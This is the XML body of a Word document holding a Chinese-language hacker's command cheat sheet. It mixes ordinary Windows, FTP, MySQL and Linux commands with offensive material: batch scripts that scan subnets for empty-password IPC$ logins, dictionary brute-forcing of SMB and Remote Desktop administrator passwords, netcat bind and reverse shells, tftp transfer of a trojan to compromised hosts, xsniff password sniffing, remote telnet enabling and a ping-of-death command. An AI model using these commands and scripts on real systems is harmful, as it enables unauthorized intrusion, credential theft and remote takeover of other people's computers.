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auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>#1 一：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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use \\ip\ipc$ " " /user:" " 建立IPC空链接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use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接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use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: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use h: \\ip\c$ 登陆后映射对方C：到本地为H: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use \\ip\ipc$ /del 删除IPC链接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use h: /del 删除映射对方到本地的为H:的映射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 user 用户名　密码　/add 建立用户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user guest /active:yes 激活guest用户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user 查看有哪些用户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user 帐户名 查看帐户的属性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localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意：administrator后加s用复数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start 查看开启了哪些服务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start 服务名　 开启服务；(如:net start telnet， net start schedule)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stop 服务名 停止某服务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time \\目标ip 查看对方时间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time \\目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息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view 查看本地局域网内开启了哪些共享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view \\ip 查看对方局域网内开启了哪些共享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config 显示系统网络设置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logoff 断开连接的共享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pause 服务名 暂停某服务 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msg /server:IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>"文本信息" 向对方发信息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ver 局域网内正在使用的网络连接类型和信息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share 查看本地开启的共享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share ipc$ 开启ipc$共享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share ipc$ /del 删除ipc$共享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share c$ /del 删除C：共享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user guest 12345 用guest用户登陆后用将密码改为12345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password 密码 更改系统登陆密码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netstat -a 查看开启了哪些端口,常用netstat -an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netstat -n 查看端口的网络连接情况，常用netstat -an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netstat -v 查看正在进行的工作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netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）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netstat -s 查看正在使用的所有协议使用情况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nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写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tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数："-w数字"用于设置超时间隔。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ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数："-l[空格]数据包大小"；"-n发送数据次数"；"-t"指一直ping。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ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)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ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数"/all"显示全部配置信息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tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)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kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)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del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如"DEL/AR *.*"表示删除当前目录下所有只读文件，"DEL/A-S *.*"表示删除当前目录下除系统文件以外的所有文件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#2 二：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del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）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move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖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fc one.txt two.txt &gt; 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"&gt; "和"&gt; &gt;" 是重定向命令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at id号 开启已注册的某个计划任务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at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止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at id号 /delete 停止某个已注册的计划任务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at 查看所有的计划任务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at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机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finger username @host 查看最近有哪些用户登陆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telnet ip 端口 远和登陆服务器,默认端口为23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open ip 连接到IP（属telnet登陆后的命令）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telnet 在本机上直接键入telnet 将进入本机的telnet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copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件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copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下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cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件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copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：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xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件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tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将"IP"的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送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tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机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ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)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route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface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arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息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start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令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mem 查看cpu使用情况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attrib 文件名(目录名) 查看某文件（目录）的属性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attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性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dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间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date /t 、 time /t 使用此参数即"DATE/T"、"TIME/T"将只显示当前日期和时间，而不必输入新日期和时间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set 指定环境变量名称=要指派给变量的字符 设置环境变量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set 显示当前所有的环境变量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set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量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pause 暂停批处理程序，并显示出：请按任意键继续....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if 在批处理程序中执行条件处理（更多说明见if命令及变量）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goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如："：start"标签）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call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）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for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）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echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置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echo 信息 在屏幕上显示出信息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echo 信息 &gt;&gt; pass.txt 将"信息"保存到pass.txt文件中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findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello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find 文件名 查找某文件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title 标题名字 更改CMD窗口标题名字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color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白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prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ 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#3 三：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ver 在DOS窗口下显示版本信息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winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）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format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS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md　目录名 创建目录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replace 源文件　要替换文件的目录 替换文件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ren 原文件名　新文件名 重命名文件名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tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称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type 文件名 显示文本文件的内容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more 文件名 逐屏显示输出文件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doskey 要锁定的命令＝字符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doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=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taskmgr 调出任务管理器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chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误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tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口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exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe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path 路径\可执行文件的文件名 为可执行文件设置一个路径。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cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?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regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；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regedit /e 注册表文件名 导出注册表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cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。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cacls 文件名 查看文件的访问用户权限列表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REM 文本内容 在批处理文件中添加注解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netsh 查看或更改本地网络配置情况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#4 四：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IIS服务命令：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iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）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iisreset /start或stop 启动（停止）所有Internet服务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iisreset /restart 停止然后重新启动所有Internet服务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iisreset /status 显示所有Internet服务状态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iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动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iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机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iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务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iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。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FTP 命令： (后面有详细说明内容)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ftp的命令行格式为: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ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。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－d 使用调试方式。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－n 限制ftp的自动登录,即不使用.netrc文件。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－g 取消全局文件名。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help [命令] 或 ？[命令] 查看命令说明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bye 或 quit 终止主机FTP进程,并退出FTP管理方式.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pwd 列出当前远端主机目录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put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中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get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中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mget [remote-files] 从远端主机接收一批文件至本地主机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mput local-files 将本地主机中一批文件传送至远端主机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dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件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ascii 设定以ASCII方式传送文件(缺省值)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bin 或 image 设定以二进制方式传送文件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bell 每完成一次文件传送,报警提示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cdup 返回上一级目录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close 中断与远程服务器的ftp会话(与open对应)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open host[port] 建立指定ftp服务器连接,可指定连接端口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delete 删除远端主机中的文件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mdelete [remote-files] 删除一批文件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mkdir directory-name 在远端主机中建立目录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rename [from] [to] 改变远端主机中的文件名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rmdir directory-name 删除远端主机中的目录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status 显示当前FTP的状态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system 显示远端主机系统类型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user user-name [password] [account] 重新以别的用户名登录远端主机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open host [port] 重新建立一个新的连接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prompt 交互提示模式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macdef 定义宏命令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lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录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chmod 改变远端主机的文件权限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case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母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cd remote－dir 进入远程主机目录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cdup 进入远程主机目录的父目录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! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip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#5 五：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MYSQL 命令：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mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。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（例：mysql -h110.110.110.110 -Uroot -P123456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注:u与root可以不用加空格，其它也一样）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exit 退出MYSQL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mysqladmin -u用户名 -p旧密码 password 新密码 修改密码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grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）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show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。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use mysql；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show tables; 显示库中的数据表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describe 表名; 显示数据表的结构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create database 库名; 建库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use 库名；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create table 表名 (字段设定列表)； 建表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drop database 库名;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drop table 表名； 删库和删表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delete from 表名; 将表中记录清空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select * from 表名; 显示表中的记录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mysqldump --opt school&gt;school.bbb 备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。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win2003系统下新增命令（实用部份）：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shutdown /参数 关闭或重启本地或远程主机。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参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。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例：shutdown /r /t 0 立即重启本地主机（无延时）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taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。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参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。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tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。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参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。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#6 六：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Linux系统下基本命令： 要区分大小写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uname 显示版本信息（同win2K的 ver）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dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）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pwd 查询当前所在的目录位置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cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。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cat 文件名 查看文件内容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cat &gt;abc.txt 往abc.txt文件中写上内容。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more 文件名 以一页一页的方式显示一个文本文件。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cp 复制文件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mv 移动文件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rm 文件名 删除文件，rm -a 目录名删除目录及子目录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mkdir 目录名 建立目录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rmdir 删除子目录，目录内没有文档。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chmod 设定档案或目录的存取权限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grep 在档案中查找字符串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diff 档案文件比较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find 档案搜寻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date 现在的日期、时间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who 查询目前和你使用同一台机器的人以及Login时间地点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 查询目前上机者的详细资料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whoami 查看自己的帐号名称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groups 查看某人的Group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passwd 更改密码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history 查看自己下过的命令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ps 显示进程状态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kill 停止某进程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gcc 黑客通常用它来编译C语言写的文件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su 权限转换为指定使用者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telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。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ftp ftp连接上某服务器（同win2K）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附：批处理命令与变量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1：for命令及变量 基本格式：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FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。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批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3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(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；"(1 -1 254)"说明：即从254到1 }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command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：&amp; 来隔开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command_parameters：为特定命令指定参数或命令行开关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IN (set)：指在(set)中取值；DO command ：指执行command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参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到取完为止{ (set)为文件时，如(d:\pass.txt)时 }。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用法举例：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@echo off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echo 用法格式：test.bat *.*.* &gt; test.txt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for /L %%G in (1 1 254) do echo %1.%%G &gt;&gt;test.txt &amp; net use \\%1.%%G /user:administrator | find "命令成功完成" &gt;&gt;test.txt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存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。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/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；&amp; 用来隔开echo 和netuse 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。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@echo off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echo 用法格式：ok.bat ip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FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200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存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。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#7 七：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2：if命令及变量 基本格式：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IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为"真"。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例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。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0 指发现并成功执行（真）；1 指没有发现、没执行（假）。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IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。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例："if "%2%"=="4" goto start"指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）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IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。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例："if not nc.exe goto end"指：如果没有发现nc.exe文件就跳到":end"标签处。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IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用&lt; &gt;括起来，因为del命令要单独一行时才能执行，用上&lt; &gt;后就等于是单独一行了；例如："if exist test.txt. else echo test.txt.missing "，注意命令中的"."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（二）系统外部命令(均需下载相关工具)：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1、瑞士军刀：nc.exe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参数说明：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-h 查看帮助信息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-d 后台模式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-e prog程序重定向，一但连接就执行［危险］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-i secs延时的间隔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-l 监听模式，用于入站连接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-L 监听模式，连接天闭后仍然继续监听，直到CTR+C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-n IP地址，不能用域名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-o film记录16进制的传输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-p[空格]端口 本地端口号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-r 随机本地及远程端口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-t 使用Telnet交互方式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-u UDP模式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-v 详细输出，用-vv将更详细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-w数字 timeout延时间隔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-z 将输入，输出关掉（用于扫锚时）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基本用法：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nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口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nc -l -p 80 开启本机的TCP 80端口并监听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nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口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nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口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nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口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高级用法：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nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止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nc -L -p 80 &gt; c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt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nc -L -p 80 &lt; c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用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type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用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本机上用：nc -l -p 本机端口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在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K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nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙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本机上用：nc -d -l -p 本机端口 &lt; 要传送的文件路径及名称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在对方主机上用：nc -vv 本机IP 本机端口 &gt; 存放文件的路径及名称 传送文件到对方主机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备 注：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| 管道命令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&lt; 或 &gt; 重定向命令。"&lt;"，例如：tlntadmn &lt; test.txt 指把test.txt的内容赋值给tlntadmn命令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＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt &gt;&gt; d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中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&gt;与&gt;&gt;的区别 　"&gt;"指：覆盖；"&gt;&gt;"指：保存到(添加到）。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如：@dir c:\winnt &gt;&gt; d:\log.txt和@dir c:\winnt &gt; d:\log.txt二个命令分别执行二次比较看：用&gt;&gt;的则是把二次的结果都保存了，而用：&gt;则只有一次的结果，是因为第二次的结果把第一次的覆盖了。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#8 八：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2、扫锚工具：xscan.exe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基本格式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xscan -host &lt;起始IP&gt;[-&lt;终止IP&gt;] &lt;检测项目&gt; [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息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xscan -file &lt;主机列表文件名&gt; &lt;检测项目&gt; [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息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检测项目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-active 检测主机是否存活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-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）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-port 检测常用服务的端口状态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-ftp 检测FTP弱口令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-pub 检测FTP服务匿名用户写权限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-pop3 检测POP3-Server弱口令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-smtp 检测SMTP-Server漏洞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-sql 检测SQL-Server弱口令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-smb 检测NT-Server弱口令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-iis 检测IIS编码/解码漏洞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-cgi 检测CGI漏洞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-nasl 加载Nessus攻击脚本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-all 检测以上所有项目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其它选项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-i 适配器编号 设置网络适配器, &lt;适配器编号&gt;可通过"-l"参数获取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-l 显示所有网络适配器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-v 显示详细扫描进度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-p 跳过没有响应的主机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-o 跳过没有检测到开放端口的主机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　 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10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-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)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用法示例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xscan -host 192.168.1.1-192.168.255.255 -all -active -p　 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机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xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机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xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测"hostlist.txt"文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机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#9 九：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3、命令行方式嗅探器: xsniff.exe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可捕获局域网内FTP/SMTP/POP3/HTTP协议密码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参数说明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-tcp 输出TCP数据报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-udp 输出UDP数据报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-icmp 输出ICMP数据报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-pass 过滤密码信息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-hide 后台运行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-host 解析主机名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-addr IP地址 过滤IP地址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-port 端口 过滤端口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-log 文件名 将输出保存到文件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-asc 以ASCII形式输出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-hex 以16进制形式输出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用法示例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xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中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xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出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4、终端服务密码破解: tscrack.exe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参数说明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-h 显示使用帮助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-v 显示版本信息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-s 在屏幕上打出解密能力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-b 密码错误时发出的声音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-t 同是发出多个连接（多线程）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-N Prevent System Log entries on targeted server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-U 卸载移除tscrack组件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-f 使用－f后面的密码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-F 间隔时间（频率）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-l 使用－l后面的用户名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-w 使用－w后面的密码字典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-p 使用－p后面的密码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-D 登录主页面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用法示例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tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码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tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户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@if not exist ipcscan.txt goto noscan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@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i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nscan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@echo 3389.txt no find or scan faild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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)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3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat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@if not exist tscrack.exe goto noscan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@tscrack %1 -l administrator -w pass.dic &gt;&gt;rouji.txt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:noscan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@echo tscrack.exe no find or scan faild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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)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hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码，并将破解结果保存在rouji.txt文件中。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5、其它：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Shutdown.exe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Shutdown \\IP地址 t:20 20秒后将对方NT自动关闭（Windows 2003系统自带工具，在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。）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fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明（端口重定向绕过防火墙）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fpipe -l 80 -s 1029 -r 80 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.sina.com.cn/" \t "https://user.qzone.qq.com/proxy/domain/b.qzone.qq.com/cgi-bin/blognew/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>www.sina.com.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> 当有人扫锚你的80端口时，他扫到的结果会完全是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.sina.com.cn/" \t "https://user.qzone.qq.com/proxy/domain/b.qzone.qq.com/cgi-bin/blognew/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>www.sina.com.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>的主机信息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Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到目标IP的23端口了。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OpenTelnet.exe (远程开启telnet工具)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opentelnet.exe \\IP 帐号　密码　ntlm认证方式　Telnet端口 （不需要上传ntlm.exe破坏微软的身份验证方式）直接远程开启对方的telnet服务后，就可用telnet \\ip 连接上对方。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NTLM认证方式：０：不使用NTLM身份验证；１：先尝试NTLM身份验证，如果失败，再使用用户名和密码；２：只使用NTLM身份验证。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ResumeTelnet.exe (OpenTelnet附带的另一个工具)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resumetelnet.exe \\IP　帐号　密码 用Telnet连接完对方后，就用这个命令将对方的Telnet设置还原，并同时关闭Telnet服务。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#10 十：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6、FTP命令详解：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FTP命令是Internet用户使用最频繁的命令之一，熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台FTP下载，那么就必须学习FTP指令。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FTP的命令行格式为：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ftp -v -d -i -n -g [主机名] ，其中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-v 显示远程服务器的所有响应信息；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-n 限制ftp的自动登录，即不使用；.n etrc文件；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-d 使用调试方式；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-g 取消全局文件名。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FTP使用的内部命令如下(中括号表示可选项):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1.![cmd[args］：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip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2.$ macro-ame[args]： 执行宏定义macro-name。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3.account[password]： 提供登录远程系统成功后访问系统资源所需的补充口令。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4.append 